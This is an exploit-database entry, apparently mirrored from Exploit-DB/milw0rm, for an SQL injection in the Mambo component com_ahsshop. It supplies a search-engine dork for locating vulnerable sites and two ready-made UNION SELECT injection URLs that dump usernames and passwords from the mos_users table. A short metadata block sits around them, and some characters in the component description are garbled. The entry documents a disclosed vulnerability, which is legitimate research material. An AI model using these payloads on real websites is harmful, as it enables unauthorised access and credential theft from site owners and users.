- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5335
- Проверка EDB
-
- Пройдено
- Автор
- S@BUN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-04-01
Код:
##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : [email protected]
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
###########################################
------------------S@BUN-------------------#
###########################################
[email protected]#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
side note:
<name>ahsshop</name>
<creationDate>15.07.2004</creationDate>
<author>Arn�r Hei�ar fyrir Netvistun ehf.</author>
<copyright>Allur h�fundarr�ttur �skilinn</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.netvistun.is</authorUrl>
<version>1.51</version>
<description>Kerfi �tla� til a� kynna v�rur og v�ruflokka eftir ver�um</description>
# milw0rm.com [2008-04-01]
- Источник
- www.exploit-db.com